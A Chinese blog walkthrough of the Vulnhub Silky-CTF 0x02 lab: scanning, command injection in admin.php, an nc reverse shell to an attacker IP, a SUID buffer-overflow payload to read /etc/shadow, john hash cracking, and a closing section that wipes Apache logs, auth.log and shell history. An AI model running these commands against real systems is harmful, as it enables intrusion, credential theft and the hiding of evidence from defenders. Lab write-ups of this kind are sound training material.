【Vulnhub系列】Vulnhub_Silky-CTF_0x02靶场渗透(原创)

最新推荐文章于 2024-11-11 21:47:34 发布
最新推荐文章于 2024-11-11 21:47:34 发布
阅读量1.2k 收藏 16
点赞数 34
分类专栏: Vulnhub系列 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70142722/article/details/140733530
版权

【Vulnhub系列靶场】Vulnhub_Silky-CTF_0x02 渗透

原文转载已经过授权
原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境配置

从网盘下载该靶机,在vm中选择【打开】,选择“我已复制该虚拟机”。

image-20240129150403292

然后设置名称和存储路径,选择【重试】即可。

image-20240129150536282

之后配置靶机的网络连接模式为【NET】模式打开。

二、信息收集

1、主机发现

先查看主机主机的IP信息,再通过nmap扫描存活主机。

nmap -sn IP
#发现目标192.168.31.54

image-20240129151155765

2、端口扫描

对目标机器的端口进行扫描

nmap.exe -F 192.168.31.54	#快速粗略扫描
nmap.exe -p- -min-rate 1000 -sT 192.168.31.54	#以1000速率进行TCP详细扫描
nmap.exe -p- -min-rate 1000 -sU 192.168.31.54	#以1000速率进行UDP详细扫描

image-20240129151509326

image-20240129152017366

nmap -sT -sV -sC -O -Pn -p 22,80 192.168.31.54	#对目标开放端口及系统进行详细扫描

image-20240129152728947

目标是linux 的Debian系统、web采用apache服务。

22端口可以进行爆破,但是作为web靶场,显然不是让我们这么做,但是不妨用如下尝试:

hydra.exe -L users.txt -P password.txt ssh://192.168.31.54	#我们需要提供账号密码的字典即可
#此处不建议进行ssh爆破,怀疑有被封IP的可能。

如下只是提供了简单的账号密码字典做了演示,并未爆破成功:

image-20240129153510803

3、web目录扫描

我们采用dirsearch 进行扫描探测

dirsearch -u http://192.168.31.54
dirsearch -u http://192.168.31.54 -x 404,403	#可以过滤404,403的响应

image-20240129152050952

4、识别web框架

image-20240129153012108

并无任何框架

三、获取shell立足点

1、访问admin.php文件

image-20240129153717863

一个登陆页面,可能存在的漏洞:SQL注入。怀疑:但是我们在端口扫描中并未探测到3306等数据库端口的存在。

先随便输入账号密码,查看错误信息。

image-20240129155018184

尝试SQL注入,并用sqlmap 进行探测。可无论如何探测,结果都是失败的。

image-20240129160144688

2、发现漏洞

请出我们的xray,进行被动扫描,发现这个地方果然存在漏洞。

image-20240129160320766

参数username存在CMD注入,也就是命令执行漏洞

我们用curl进行查看

curl http://192.168.31.54/admin.php?username=whoami&password=222222

image-20240129163033098

确认存在命令执行漏洞

3、获取反弹shell

这个时候进行shell反弹,使用如下反弹命令(可以在命令反弹网站进行逐一尝试)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.31.50 4444 >/tmp/f

并用nc进行监听,成功获取shell

image-20240129163627322

四、提权root

1、查找SUID文件

find / -user root -perm -4000 -print 2>/dev/null

image-20240129163847382

可以看到一个醒目的文件,前去查看。

image-20240129164023868

是一个755的SUID文件。

2、查看shadow文件

尝试执行该文件

image-20240129164142441

这里有点蒙圈,查看佬的文章得知此处利用缓冲区溢出,利用如下

./cat_shadow $(python -c 'print "A"*64 + "\x62\x59\x6c\x49"')

image-20240129164347287

查看到了/etc/shadow文件内容,此时可以对root、silky用户的密码进行爆破

3、获取root密码

将查看到的shadow文件中的账号密码复制保存到本地,提取能登陆的账号密码

image-20240129164854076

用john 进行破解

john.exe --wordlist=..\rockyou.txt pass.txt

image-20240129170910351

可以看到,已经破解出来root的密码

4、提权到root

我们尝试su 到root用户,却出现了意外。

image-20240129171004305

这个情况还是头一次见,问GPT得知是因为不是一个交互式的终端导致的。

用如下命令切换到交互式shell

SHELL=/bin/bash script -q /dev/null

在进行root成功

image-20240129171213571

五、痕迹清理

1、web日志清理

先找到web日志的位置,我们在一开始信息收集中知道网站采用apache2服务。我们可以直接查找apache2的配置文件

find / -name apache2.conf 2>/dev/null

image_20240129193343.png

查找log 的相关位置

cat /etc/apache2/apache2.conf | grep log

image_20240129194029.png

find / -name error.log 2>/dev/null

image_20240129194339.png

将apache2的日志下的文件都删除掉,顺便把看到的mysql的日志一并删除。

image_20240129194419.png

2、登录日志清理

当我们登录一台机器的时候会在机器的登录日志中留下痕迹。

日志位置:/var/log/auth.log(Centos系统是/var/log/secure)

可以直接删除该文件,也可以用如下命令只删除几行

sed $(($(sed -n '$=' auth.log)-10+1)),${A}d -i auth.log	#删除倒数10行

3、历史命令清理

此次是从www用户直接到root,因此我们只需要直接清除root用户的历史命令就可以了。

echo "" > ~/.bash_history && history -c

原文转载已经过授权
更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

京落尘
关注
专栏目录
0x02 ctf从零开始学:web入门学习路线
爱党人士
05-23 3811
废话不多说,直接放干货。 Web (其實就是開發網站所常用的知識) 要对下面的这些基础知识掌握透。 前端 **HTML CSS JavaScript** 後端 ****PHP ASP JSP C#** 資料庫 **SQL MySQL, Oracle, SQLite...**** 協定 HTTP HTTPS 檔案格式 **XML JSON WWW伺服器 Apache, nginx... li...
Silky-CTF_0x01 WriteUP
qq_64664156的博客
04-16 337
Silky-CTF_0x01wp
记一道USB流量分析CTF
热门推荐
qq_36609913的博客
11-19 1万+
USB流量分析
记BUUCTF 0x02
qq_43871200的博客
03-20 226
buuctf web分类,部分题解 [网鼎杯 2018]Fakebook 本来看到?no=1还以为又是sql注入。。结果搞了半天啥也没有,只有一个users表,然后看源代码时看到iframe标签,就想到可能是ssrf(然而只是听过这个攻击方法,并不知道怎么应用),于是乎又是日常搜题解 https://www.cnblogs.com/wangtanzhi/p/11900128.html ...
anti-wrinkle_Anti-wrinkle是什么意思
weixin_39647499的博客
12-19 1423
1. Each week, use this product in conjunction with Water Breath Sleeping Eye Mask and Biochemical Anti-Wrinkle Sleeping Eye Mask two to three times, these two eye masks can be used alternatively.每周配合使...
vulnhub之tiki
li1136594919的博客
07-08 299
22和80,139,445 端口开放,一般而言22端口的优先级排后,80端口攻击成功的可能性最大,优先级最高,但139和445是samba服务,可以首先查看是否有敏感信息泄露。④随处翻找,在wiki->Last Changes->ALL中发现Credentials,获取到一组凭据silky:Agy8Y7SPJNXQzqA。③kali 上使用searchsploit tiki 21.1搜索公开漏洞,发现一个bypass鉴权漏洞,下载并执行。②发现有可读目录,尝试读取,发现无法进行交互。
Vulnhub:Tiki-1靶机——记录土豆片第一次靶机渗透
土豆片的博客
10-21 275
复现0day攻击的靶机。号称有OSCP级别。应该是个OSCP简单级别适合新手进行信息收集,初级的脚本利用即可无需复杂的提权操作。
Vulnhub: Tiki-1靶机
qq_43884092的博客
05-18 242
tiki cms身份验证绕过,sudo提权
silky_2.11-1.0.13.zip
09-26
Silky_2.11-1.0.13.zip】这个压缩包文件是针对Haxe编程语言与Scala交互的开源项目。Haxe是一种多平台的编程语言,它允许开发者编写一次代码,然后编译成多种目标平台,如JavaScript、C++、Java、PHP等。而Scala则...
定时器流水灯_keil_silky2j_
09-30
【定时器流水灯_keil_silky2j_】是一个基于单片机编程的项目,主要使用了Keil集成开发环境以及Silky2J开发板。这个项目的主要目的是通过编程实现LED流水灯的效果,这对于初学者来说是一个很好的实践案例,能够帮助...
Silky框架-C#课程设计-silky-main.zip
09-19
Silky框架旨在帮助开发人员在.net平台下通过简单的代码和配置快速构建微服务开发框架。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8539
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【论文速读】| F2A:一种利用伪装安全检测智能体进行提示注入的创新方法
m0_73736695的博客
11-11 339
这篇论文研究了大语言模型(LLMs)在内容安全检测领域的广泛应用,尤其是其与安全检测代理结合后的盲目信任问题。作者提出了一种称为"伪造代理攻击"(Feign Agent Attack, F2A)的新型攻击手段,通过伪造的安全检测结果绕过LLM的防御机制,进而让LLM输出有害内容。
智慧场馆:安全、节能与智能化管理的未来
Guheyun001的博客
11-07 795
同时,智慧场馆的智能系统还可以根据用户需求和反馈,灵活调整服务内容和模式,提供更个性化、贴心的场馆体验,增加用户粘性和满意度。通过智能化的管理系统,管理员可以轻松实现远程监控、智能调度、预测维护等操作,提高管理效率和服务水平,为用户提供更便捷、高效的场馆体验。智慧场馆通过引入智能照明系统、智能空调系统、能源管理系统等技术手段,有效优化场馆的能源利用效率,实现节能环保的目标。随着科技的不断创新和应用,智慧场馆将在未来发挥越来越重要的作用,为用户带来更便捷、安全、舒适的场馆体验。
AI与隐私:Facebook如何在数据保护中平衡创新与安全
2301_78954254的博客
11-07 610
在快速发展的数字时代,人工智能(AI)技术的应用正在为社交媒体平台带来前所未有的创新。然而,伴随着技术的进步,用户的隐私保护问题也愈加凸显。作为全球最大的社交网络之一,Facebook在推动AI技术应用的同时,必须面对如何在数据保护中实现创新与安全的平衡。本文将探讨Facebook在这一领域的策略和实践。
FileLink跨网文件安全摆渡系统——企业数据流转的安全桥梁
weixin_44264342的博客
11-11 625
随着企业信息化建设的不断推进,跨网文件传输的需求日益增长,FileLink跨网文件安全摆渡系统通过全方位的安全保障与高效传输能力,成为企业解决跨网文件传输难题的理想选择。无论是对数据的加密保护、权限管理、合规审计,还是对传输效率的优化,FileLink都能够提供全面的解决方案,确保文件在内外网之间的安全、高效流转。如果您的企业正面临跨网文件传输的挑战,不妨选择FileLink,让它成为您企业数据流转的安全桥梁,助力企业信息流通的高效性和安全性,为您的业务发展保驾护航。
网络安全---安全见闻2
最新发布
久恙502的博客
11-11 488
拓宽视野不仅能够丰富我们的知识体系,也是自我提升和深造学习的重要途径!!!
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 365
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 1204
信息安全工程师——操作系统安全概述篇
Silky框架:.NET平台下微服务应用的构建利器
资源摘要信息:"Silky框架是一个面向.NET平台的开发框架,其主要目的是为了帮助开发者能够更加高效地构建微服务应用。框架提供了两个核心功能:RPC通信和微服务治理。 首先,我们来探讨RPC通信。RPC(Remote ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值